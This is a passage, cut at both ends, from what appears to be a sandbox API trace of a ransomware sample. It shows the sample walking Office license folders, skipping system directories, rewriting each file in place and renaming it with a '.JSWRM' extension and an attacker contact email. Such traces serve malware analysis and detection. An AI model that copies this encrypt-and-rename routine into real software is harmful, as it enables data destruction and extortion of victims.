dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0105.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0105.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.390] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6248ddb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6248ddb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe63079a2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription1-pl.xrm-ms", cAlternateFileName="O365PR~3.XRM")) returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2=".") returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="..") returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="...") returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="windows") returned -1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="recovery") returned -1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.390] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-pl.xrm-ms", lpString2="msocache") returned 1 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0105.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0105.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.391] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0105.391] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.391] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.393] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.393] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.393] CloseHandle (hObject=0x45c) returned 1 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0105.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0105.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0105.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.394] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.395] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6222ba8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6222ba8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe62bb50d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6e65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription1-ppd.xrm-ms", cAlternateFileName="O365PR~2.XRM")) returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2=".") returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="..") returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="...") returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="windows") returned -1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.395] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0105.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.396] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28261) returned 1 [0105.396] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e60) returned 0x24c1d0 [0105.396] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6e60, lpOverlapped=0x0) returned 1 [0105.400] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.400] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6e60, lpOverlapped=0x0) returned 1 [0105.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.400] CloseHandle (hObject=0x45c) returned 1 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0105.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0105.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0105.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0105.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0105.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.400] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0105.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0105.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.401] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6543cce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6543cce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6674f22, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription1-ul-oob.xrm-ms", cAlternateFileName="O378F4~1.XRM")) returned 1 [0105.401] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.401] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.402] lstrcmpiW (lpString1="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0105.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.403] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11646) returned 1 [0105.403] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.403] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.414] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.414] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.415] CloseHandle (hObject=0x45c) returned 1 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0105.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 